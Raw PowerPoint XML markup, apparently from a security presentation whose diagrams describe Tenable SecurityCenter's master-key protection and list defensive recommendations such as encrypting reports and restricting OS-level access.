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76" r:id="rId2"/>
    <p:sldId id="301" r:id="rId3"/>
    <p:sldId id="288" r:id="rId4"/>
    <p:sldId id="289" r:id="rId5"/>
    <p:sldId id="281" r:id="rId6"/>
    <p:sldId id="285" r:id="rId7"/>
    <p:sldId id="295" r:id="rId8"/>
    <p:sldId id="298" r:id="rId9"/>
    <p:sldId id="299" r:id="rId10"/>
    <p:sldId id="306" r:id="rId11"/>
    <p:sldId id="300" r:id="rId12"/>
    <p:sldId id="309" r:id="rId13"/>
    <p:sldId id="283" r:id="rId14"/>
    <p:sldId id="305" r:id="rId15"/>
    <p:sldId id="286" r:id="rId16"/>
    <p:sldId id="307" r:id="rId17"/>
    <p:sldId id="310" r:id="rId18"/>
    <p:sldId id="315" r:id="rId19"/>
    <p:sldId id="316" r:id="rId20"/>
    <p:sldId id="318" r:id="rId21"/>
    <p:sldId id="320" r:id="rId22"/>
    <p:sldId id="324" r:id="rId23"/>
    <p:sldId id="282" r:id="rId24"/>
    <p:sldId id="325" r:id="rId25"/>
    <p:sldId id="314" r:id="rId26"/>
    <p:sldId id="326" r:id="rId27"/>
    <p:sldId id="322" r:id="rId28"/>
    <p:sldId id="327" r:id="rId29"/>
    <p:sldId id="333" r:id="rId30"/>
    <p:sldId id="330" r:id="rId31"/>
    <p:sldId id="335" r:id="rId32"/>
    <p:sldId id="331" r:id="rId33"/>
    <p:sldId id="319" r:id="rId34"/>
    <p:sldId id="334" r:id="rId35"/>
    <p:sldId id="339" r:id="rId36"/>
    <p:sldId id="336" r:id="rId37"/>
    <p:sldId id="338" r:id="rId38"/>
    <p:sldId id="296" r:id="rId39"/>
    <p:sldId id="321" r:id="rId40"/>
    <p:sldId id="284" r:id="rId41"/>
    <p:sldId id="265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882">
          <p15:clr>
            <a:srgbClr val="A4A3A4"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="4" orient="horz" pos="236">
          <p15:clr>
            <a:srgbClr val="A4A3A4"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="5" pos="340">
          <p15:clr>
            <a:srgbClr val="A4A3A4"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="6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00"/>
    <a:srgbClr val="EDF1F3"/>
    <a:srgbClr val="6AA06A"/>
    <a:srgbClr val="F52882"/>
    <a:srgbClr val="063954"/>
    <a:srgbClr val="E6EBEE"/>
    <a:srgbClr val="698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80" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr snapToGrid="0">
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="96" d="100"/>
          <a:sy n="96" d="100"/>
        </p:scale>
        <p:origin x="855" y="51"/>
      </p:cViewPr>
      <p:guideLst>
        <p:guide orient="horz" pos="2882"/>
        <p:guide orient="horz" pos="236"/>
        <p:guide pos="340"/>
        <p:guide pos="5420"/>
      </p:guideLst>
    </p:cSldViewPr>
  </p:slideViewPr>
  <p:outlineViewPr>
    <p:cViewPr>
      <p:scale>
        <a:sx n="33" d="100"/>
        <a:sy n="33" d="100"/>
      </p:scale>
      <p:origin x="0" y="-137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60DCE-8950-41C5-8CDD-18CF3BDB4E4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</dgm:pt>
    <dgm:pt modelId="{7759AB9F-5184-43DB-98E8-F48545CC42E8}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" dirty="0"/>
            <a:t>Master key</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{9884E62D-F3C0-40F1-87FA-95FC0F70128D}" type="parTrans" cxnId="{B6D36BA2-9BC8-4849-BD06-E53D24BC9977}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{D83DE647-A599-42FC-905C-7C37BF4995AD}" type="sibTrans" cxnId="{B6D36BA2-9BC8-4849-BD06-E53D24BC9977}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{4FB726BA-CBBF-49C9-951A-A82C66025A9E}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" dirty="0"/>
            <a:t>Installation stage</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{96056B79-654A-46E4-AA90-C183A5E174B3}" type="parTrans" cxnId="{6EA6DCBA-DE20-4D47-A4BD-3684120755A0}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{612C8EBC-CA34-4D61-9D5E-B36E57EFD095}" type="sibTrans" cxnId="{6EA6DCBA-DE20-4D47-A4BD-3684120755A0}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{73B16F25-344F-41DE-B0FE-F52B73E6FCC8}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" dirty="0"/>
            <a:t>Hardware-dependent</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{520BF7A6-4228-4533-970F-961578FBA663}" type="parTrans" cxnId="{AD152F44-0A7E-4213-B8F9-03ABFB69822E}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{528EF444-3973-4FCB-802C-563CE361BF90}" type="sibTrans" cxnId="{AD152F44-0A7E-4213-B8F9-03ABFB69822E}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{5EB582F9-288D-4547-B24F-A53B1DAD8167}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" dirty="0"/>
            <a:t>Protected by user-defined password</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{6663C810-998E-4FB6-A6A3-DDFDDC236920}" type="parTrans" cxnId="{40CF0179-62F1-4E58-805E-711872AE88D8}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{6F1E06A3-4843-4170-893E-54DD7B1DE57A}" type="sibTrans" cxnId="{40CF0179-62F1-4E58-805E-711872AE88D8}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{66573A68-4057-4A96-965B-14F26E647BB6}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" dirty="0"/>
            <a:t>Build-in scripts</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{FF72DC76-8354-421D-B9A1-43A1C0A211CA}" type="parTrans" cxnId="{8C1054BB-5A33-4028-A2C3-05CD81F07EC9}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{F74C86BE-8F83-441A-A064-9749ECE199FD}" type="sibTrans" cxnId="{8C1054BB-5A33-4028-A2C3-05CD81F07EC9}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{C0E68AF1-FEBB-4546-9FA8-608177577324}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" dirty="0"/>
            <a:t>Protecting execution in controlled environments</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{3ADCC89E-1466-43B0-B925-B2810FCEF91C}" type="parTrans" cxnId="{1D2C1488-D6B9-4CE3-B8F8-F70541E10B35}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{17F6C94D-CA07-469D-9A6F-355EC6855B60}" type="sibTrans" cxnId="{1D2C1488-D6B9-4CE3-B8F8-F70541E10B35}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{A626B0A4-9EE1-4AC9-854F-BE0BDF08F0E4}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" dirty="0"/>
            <a:t>Protected by </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" dirty="0" err="1"/>
            <a:t>SourceGuardian</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{42498BE8-8FF4-4423-9E29-E95D5CE0AE71}" type="parTrans" cxnId="{4E4700CE-8249-4264-90D8-81415647FDE0}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{BA771DDD-5BC2-425E-858C-0839BEE0B9E3}" type="sibTrans" cxnId="{4E4700CE-8249-4264-90D8-81415647FDE0}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{D1AC75ED-60B3-4C77-9234-38B1FE776C0C}" type="pres">
      <dgm:prSet presAssocID="{C8760DCE-8950-41C5-8CDD-18CF3BDB4E4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DD0E9A-326B-41B2-9201-BB7C5A7329D7}" type="pres">
      <dgm:prSet presAssocID="{7759AB9F-5184-43DB-98E8-F48545CC42E8}" presName="centerShape" presStyleLbl="node0" presStyleIdx="0" presStyleCnt="1"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{42453135-6B25-4019-AE05-8D7A2135C0A1}" type="pres">
      <dgm:prSet presAssocID="{FF72DC76-8354-421D-B9A1-43A1C0A211CA}" presName="parTrans" presStyleLbl="bgSibTrans2D1" presStyleIdx="0" presStyleCnt="3"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{6C4F60A4-1506-4F69-BD21-651D83B45100}" type="pres">
      <dgm:prSet presAssocID="{66573A68-4057-4A96-965B-14F26E647BB6}" presName="node" presStyleLbl="node1" presStyleIdx="0" presStyleCnt="3" custScaleY="61605" custRadScaleRad="105245" custRadScaleInc="-25608">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{F70659BB-28A1-4AEF-8D1D-27EBF145BB0A}" type="pres">
      <dgm:prSet presAssocID="{520BF7A6-4228-4533-970F-961578FBA663}" presName="parTrans" presStyleLbl="bgSibTrans2D1" presStyleIdx="1" presStyleCnt="3"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{879D614E-5E85-47D8-B881-0AD9D9DA9A7B}" type="pres">
      <dgm:prSet presAssocID="{73B16F25-344F-41DE-B0FE-F52B73E6FCC8}" presName="node" presStyleLbl="node1" presStyleIdx="1" presStyleCnt="3" custScaleX="139545" custScaleY="65421">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{4275E032-E225-497E-9E51-2C461A25B548}" type="pres">
      <dgm:prSet presAssocID="{96056B79-654A-46E4-AA90-C183A5E174B3}" presName="parTrans" presStyleLbl="bgSibTrans2D1" presStyleIdx="2" presStyleCnt="3"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{D6CDB17D-AD07-4BBC-A591-1717B0EDF04D}" type="pres">
      <dgm:prSet presAssocID="{4FB726BA-CBBF-49C9-951A-A82C66025A9E}" presName="node" presStyleLbl="node1" presStyleIdx="2" presStyleCnt="3" custScaleX="111482" custScaleY="61437" custRadScaleRad="109890" custRadScaleInc="28472">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
  </dgm:ptLst>
  <dgm:cxnLst>
    <dgm:cxn modelId="{01E64418-5DCB-4020-BAF3-5A6ACB28BA39}" type="presOf" srcId="{5EB582F9-288D-4547-B24F-A53B1DAD8167}" destId="{D6CDB17D-AD07-4BBC-A591-1717B0EDF04D}" srcOrd="0" destOrd="1" presId="urn:microsoft.com/office/officeart/2005/8/layout/radial4"/>
    <dgm:cxn modelId="{04E0FC1A-7F07-4643-98EB-B2FA54487572}" type="presOf" srcId="{73B16F25-344F-41DE-B0FE-F52B73E6FCC8}" destId="{879D614E-5E85-47D8-B881-0AD9D9DA9A7B}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/radial4"/>
    <dgm:cxn modelId="{4B74DD1D-BF51-41E9-9A58-E6B810B66B26}" type="presOf" srcId="{66573A68-4057-4A96-965B-14F26E647BB6}" destId="{6C4F60A4-1506-4F69-BD21-651D83B45100}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/radial4"/>
    <dgm:cxn modelId="{07D47124-8849-43C2-AFD2-8FB0C62D361A}" type="presOf" srcId="{A626B0A4-9EE1-4AC9-854F-BE0BDF08F0E4}" destId="{6C4F60A4-1506-4F69-BD21-651D83B45100}" srcOrd="0" destOrd="1" presId="urn:microsoft.com/office/officeart/2005/8/layout/radial4"/>
    <dgm:cxn modelId="{807FBC3E-95C3-428F-B5C1-6339472F681C}" type="presOf" srcId="{4FB726BA-CBBF-49C9-951A-A82C66025A9E}" destId="{D6CDB17D-AD07-4BBC-A591-1717B0EDF04D}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/radial4"/>
    <dgm:cxn modelId="{D5B97D5B-FD6D-45CD-BDCE-22075FDF88A3}" type="presOf" srcId="{C0E68AF1-FEBB-4546-9FA8-608177577324}" destId="{879D614E-5E85-47D8-B881-0AD9D9DA9A7B}" srcOrd="0" destOrd="1" presId="urn:microsoft.com/office/officeart/2005/8/layout/radial4"/>
    <dgm:cxn modelId="{E3D72D61-13F1-4D28-B326-1F45F243DA23}" type="presOf" srcId="{C8760DCE-8950-41C5-8CDD-18CF3BDB4E41}" destId="{D1AC75ED-60B3-4C77-9234-38B1FE776C0C}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/radial4"/>
    <dgm:cxn modelId="{AD152F44-0A7E-4213-B8F9-03ABFB69822E}" srcId="{7759AB9F-5184-43DB-98E8-F48545CC42E8}" destId="{73B16F25-344F-41DE-B0FE-F52B73E6FCC8}" srcOrd="1" destOrd="0" parTransId="{520BF7A6-4228-4533-970F-961578FBA663}" sibTransId="{528EF444-3973-4FCB-802C-563CE361BF90}"/>
    <dgm:cxn modelId="{291DEA6F-D477-4CBD-9EDA-7F22777D5246}" type="presOf" srcId="{7759AB9F-5184-43DB-98E8-F48545CC42E8}" destId="{53DD0E9A-326B-41B2-9201-BB7C5A7329D7}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/radial4"/>
    <dgm:cxn modelId="{A9FE9158-540B-4AAF-8D3C-04DC41DE0FCE}" type="presOf" srcId="{96056B79-654A-46E4-AA90-C183A5E174B3}" destId="{4275E032-E225-497E-9E51-2C461A25B548}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/radial4"/>
    <dgm:cxn modelId="{40CF0179-62F1-4E58-805E-711872AE88D8}" srcId="{4FB726BA-CBBF-49C9-951A-A82C66025A9E}" destId="{5EB582F9-288D-4547-B24F-A53B1DAD8167}" srcOrd="0" destOrd="0" parTransId="{6663C810-998E-4FB6-A6A3-DDFDDC236920}" sibTransId="{6F1E06A3-4843-4170-893E-54DD7B1DE57A}"/>
    <dgm:cxn modelId="{1D2C1488-D6B9-4CE3-B8F8-F70541E10B35}" srcId="{73B16F25-344F-41DE-B0FE-F52B73E6FCC8}" destId="{C0E68AF1-FEBB-4546-9FA8-608177577324}" srcOrd="0" destOrd="0" parTransId="{3ADCC89E-1466-43B0-B925-B2810FCEF91C}" sibTransId="{17F6C94D-CA07-469D-9A6F-355EC6855B60}"/>
    <dgm:cxn modelId="{B6D36BA2-9BC8-4849-BD06-E53D24BC9977}" srcId="{C8760DCE-8950-41C5-8CDD-18CF3BDB4E41}" destId="{7759AB9F-5184-43DB-98E8-F48545CC42E8}" srcOrd="0" destOrd="0" parTransId="{9884E62D-F3C0-40F1-87FA-95FC0F70128D}" sibTransId="{D83DE647-A599-42FC-905C-7C37BF4995AD}"/>
    <dgm:cxn modelId="{6EA6DCBA-DE20-4D47-A4BD-3684120755A0}" srcId="{7759AB9F-5184-43DB-98E8-F48545CC42E8}" destId="{4FB726BA-CBBF-49C9-951A-A82C66025A9E}" srcOrd="2" destOrd="0" parTransId="{96056B79-654A-46E4-AA90-C183A5E174B3}" sibTransId="{612C8EBC-CA34-4D61-9D5E-B36E57EFD095}"/>
    <dgm:cxn modelId="{8C1054BB-5A33-4028-A2C3-05CD81F07EC9}" srcId="{7759AB9F-5184-43DB-98E8-F48545CC42E8}" destId="{66573A68-4057-4A96-965B-14F26E647BB6}" srcOrd="0" destOrd="0" parTransId="{FF72DC76-8354-421D-B9A1-43A1C0A211CA}" sibTransId="{F74C86BE-8F83-441A-A064-9749ECE199FD}"/>
    <dgm:cxn modelId="{4E4700CE-8249-4264-90D8-81415647FDE0}" srcId="{66573A68-4057-4A96-965B-14F26E647BB6}" destId="{A626B0A4-9EE1-4AC9-854F-BE0BDF08F0E4}" srcOrd="0" destOrd="0" parTransId="{42498BE8-8FF4-4423-9E29-E95D5CE0AE71}" sibTransId="{BA771DDD-5BC2-425E-858C-0839BEE0B9E3}"/>
    <dgm:cxn modelId="{66A6ADD5-AAA8-4C23-9F38-6D8A8B8089F7}" type="presOf" srcId="{520BF7A6-4228-4533-970F-961578FBA663}" destId="{F70659BB-28A1-4AEF-8D1D-27EBF145BB0A}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/radial4"/>
    <dgm:cxn modelId="{1B331BEC-5188-42C3-9678-2077FB60B8C7}" type="presOf" srcId="{FF72DC76-8354-421D-B9A1-43A1C0A211CA}" destId="{42453135-6B25-4019-AE05-8D7A2135C0A1}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/radial4"/>
    <dgm:cxn modelId="{6EBE4121-DE1B-4ACC-9EF1-F114E1F309F1}" type="presParOf" srcId="{D1AC75ED-60B3-4C77-9234-38B1FE776C0C}" destId="{53DD0E9A-326B-41B2-9201-BB7C5A7329D7}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/radial4"/>
    <dgm:cxn modelId="{BB2329A2-6443-4BB8-B300-AB024E29D02E}" type="presParOf" srcId="{D1AC75ED-60B3-4C77-9234-38B1FE776C0C}" destId="{42453135-6B25-4019-AE05-8D7A2135C0A1}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/radial4"/>
    <dgm:cxn modelId="{E5426CDF-41B7-445A-A9CD-D2AF6D6F24E1}" type="presParOf" srcId="{D1AC75ED-60B3-4C77-9234-38B1FE776C0C}" destId="{6C4F60A4-1506-4F69-BD21-651D83B45100}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/radial4"/>
    <dgm:cxn modelId="{10CC4D98-E705-4413-ADDD-91316395A9E1}" type="presParOf" srcId="{D1AC75ED-60B3-4C77-9234-38B1FE776C0C}" destId="{F70659BB-28A1-4AEF-8D1D-27EBF145BB0A}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/radial4"/>
    <dgm:cxn modelId="{3A89CFCD-496C-4AD6-82A7-F81831009D55}" type="presParOf" srcId="{D1AC75ED-60B3-4C77-9234-38B1FE776C0C}" destId="{879D614E-5E85-47D8-B881-0AD9D9DA9A7B}" srcOrd="4" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/radial4"/>
    <dgm:cxn modelId="{12FEB922-DECE-4002-9EAE-516F810D9D00}" type="presParOf" srcId="{D1AC75ED-60B3-4C77-9234-38B1FE776C0C}" destId="{4275E032-E225-497E-9E51-2C461A25B548}" srcOrd="5" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/radial4"/>
    <dgm:cxn modelId="{8433DBED-1969-422B-8CC5-1B9C8F8C962E}" type="presParOf" srcId="{D1AC75ED-60B3-4C77-9234-38B1FE776C0C}" destId="{D6CDB17D-AD07-4BBC-A591-1717B0EDF04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EBD13F-DE8B-4E1A-893A-EB0A2BA41FC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0A092C-CB6C-4F8F-B066-D1D316302E46}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" dirty="0"/>
            <a:t>Customers</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{CCFA7460-4C39-45B6-B834-AB9473DC3226}" type="parTrans" cxnId="{3FEF85C4-B1F0-447A-8B81-D586E6E1A6C3}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{617FDA72-291F-4A21-AE37-C09DC7848524}" type="sibTrans" cxnId="{3FEF85C4-B1F0-447A-8B81-D586E6E1A6C3}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{E0BE7B4C-7CFE-4EA9-BB60-26B29769782A}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" dirty="0"/>
            <a:t>Restrict access to SecurityCenter on OS level</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{94E07381-31BC-4977-BA35-F5B2228A6FB2}" type="parTrans" cxnId="{826219E9-AF87-4848-BE2A-196E237BF1D8}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{091AFC1A-AC03-4753-AEB4-9D2435F6069E}" type="sibTrans" cxnId="{826219E9-AF87-4848-BE2A-196E237BF1D8}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{BA206D65-9B26-4C99-AFD9-ED4FDE11F248}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" dirty="0"/>
            <a:t>Tenable</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{6A6AF91A-B278-4127-8DF1-629E93126466}" type="parTrans" cxnId="{430CDF2D-37D8-4655-ACE9-3DB3E35AE355}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{D7A7F37C-109E-4925-9B9A-50C5ED844EA5}" type="sibTrans" cxnId="{430CDF2D-37D8-4655-ACE9-3DB3E35AE355}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{2FB5F284-544F-444B-9232-542C1676512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Tenable should take more actions to protect customers’ data.</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{FF8A95F5-A4FB-4E65-9AB4-B2C374748063}" type="parTrans" cxnId="{FF504864-60D9-4AA7-AB2C-524D93554F8E}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{E1691290-6727-4F0B-BFC2-38AF332AF75F}" type="sibTrans" cxnId="{FF504864-60D9-4AA7-AB2C-524D93554F8E}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{FC633840-3CFC-4B57-BBB8-317C633215CC}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" dirty="0"/>
            <a:t>Encrypt all reports</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{EAE706AA-F63D-4325-9878-A0760866B9DC}" type="parTrans" cxnId="{00C3F224-AA0F-4BC3-8BC1-E959B35D3A68}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{1FA58D0A-58BE-4EA7-B8F8-1F89622E6B46}" type="sibTrans" cxnId="{00C3F224-AA0F-4BC3-8BC1-E959B35D3A68}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{4D183FC4-5C2B-456E-8623-86AE19017CFC}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" dirty="0"/>
            <a:t>Use password protected private keys where possible</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{A0D3873C-DD4F-4D00-A310-1444008603E2}" type="parTrans" cxnId="{64F1AD4B-4D72-4220-9EA5-76AA6EB0EF42}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{37720219-77B1-4022-9A9C-19D4B4E16975}" type="sibTrans" cxnId="{64F1AD4B-4D72-4220-9EA5-76AA6EB0EF42}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
